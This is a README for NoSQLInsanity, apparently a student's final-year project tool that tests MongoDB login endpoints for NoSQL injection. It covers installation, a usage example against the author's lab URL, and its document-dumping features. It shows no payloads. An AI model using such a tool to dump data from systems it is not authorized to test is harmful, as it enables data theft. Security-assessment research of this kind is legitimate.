đź’‰ NoSQLInsanity
This research for final year project
NoSQLInsanity: Tool for Security Assesment NoSQL
Wireframe
https://whimsical.com/nosqlinsanity-F2thpyebcaNPyCQr4UBabe
Researcher : Roby Firnando Yusuf aka greycat aka 0x00b0
Supervisor : Daniel Rudiaman S. S.T., M. Kom
Installation
It's fairly simple to install NoSQLInsanity:
from Source
Clone repository and install requirements:
$ git clone https://github.com/robyfirnandoyusuf/NoSQLInsanity.git
$ cd NoSQLInsanity/
$ pip3 install -r requirements.txt
from Docker
Pull the Docker image by running:
$ docker pull robyfirnando/nosqlinsanity:v2.0.1
from PyPi
Coming Soon
Usage
Simply,
# from source
$ python3 NoSQLInsanity.py --url "https://lab.s.he-left.me/auth/login" --platform "mongodb"
# from docker
$ docker run -it robyfirnando/nosqlinsanity:v2.0.1 --url "https://lab.s.he-left.me/auth/login" --platform "mongodb"
Options
Here are all the options it supports.
Argument | Description |
---|---|
--url | Vulnerable endpoint |
-s, --silent | Silent mode (hide the time measurements) |
Features
- Dump by known a value
- Dump by unknown value (dump all documents by specify field)
- Multiple option algorithms (Linear and Binary Search)
License
NoSQLInsanity
is distributed under Apache 2.
Acknowledments
Since this tool includes some contributions, and I'm not an asshole, I'll publically thank the following users for their supports, helps and resources:
- Daniel Lu aka BrownieInMotion (DiceGang - Redpwn)
- Fernanda Darmasaputra (Tim Petir - OurLastNight)
- Pavel Sorokin (BI.ZONE Security Researcher)
- and You
TODO:
- Print Info
- Menu Param
- Menu HTTP Method
- Menu Input Payload
- Engine Checker Website is UP or DOWN
- Engine Vuln Test
- Auto Set Success-Identifier
- Engine Linear (Dump known value)
- Engine Linear (Dump unknown value)
- Engine Linear Count Length
- Engine Binary Search (Dump known value)
- Engine Binary Search (Dump unknown value)
- Engine BinSearch Count Length
- Research ability MongoDB to perform BinSearch
- Add measurement each chars LinearSearch (Dump known value)
- Add measurement each chars LinearSearch (Dump unknown value)
- Add measurement each chars BinSearch (Dump known value)
- Add measurement each chars BinSearch (Dump unknown value)
- Log Report CSV